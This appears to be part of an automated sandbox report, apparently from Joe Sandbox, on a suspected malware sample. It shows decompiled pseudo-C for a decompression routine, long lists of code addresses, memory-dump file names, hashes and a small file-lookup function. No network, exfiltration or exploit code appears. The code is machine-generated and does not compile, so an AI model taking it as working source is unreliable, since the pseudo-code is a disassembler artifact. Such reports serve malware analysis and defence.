                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							goto L55;
                                                          						case 0x1b:
                                                          							L75:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1b;
                                                          								goto L170;
                                                          							}
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							__eflags = __eax -  *(__ebp - 0x74);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx =  *(__ebp - 8);
                                                          							__cl =  *(__eax + __edx);
                                                          							__eax =  *(__ebp - 0x14);
                                                          							 *(__ebp - 0x5c) = __cl;
                                                          							 *(__eax + __edx) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t274 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t274;
                                                          							__eax =  *(__ebp - 0x68);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							_t283 = __ebp - 0x64;
                                                          							 *_t283 =  *(__ebp - 0x64) - 1;
                                                          							__eflags =  *_t283;
                                                          							 *( *(__ebp - 0x68)) = __cl;
                                                          							goto L79;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = __edx;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d5f
                                                          0x00406d64
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00000000
                                                          0x0040743e
                                                          0x00406d66
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00000000
                                                          0x00406f97
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e23
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed3
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x0040710a
                                                          0x0040710a
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406eac
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00000000
                                                          0x00406e1a
                                                          0x00406ea6
                                                          0x00406daf
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x00000000
                                                          0x004073c8
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00000000
                                                          0x0040753b
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00000000
                                                          0x00407390
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                          • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                          • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                          • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040699E(WCHAR* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                          				if(_t2 == 0xffffffff) {
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t2);
                                                          				return 0x426798;
                                                          			}




                                                          0x004069a9
                                                          0x004069b2
                                                          0x00000000
                                                          0x004069bf
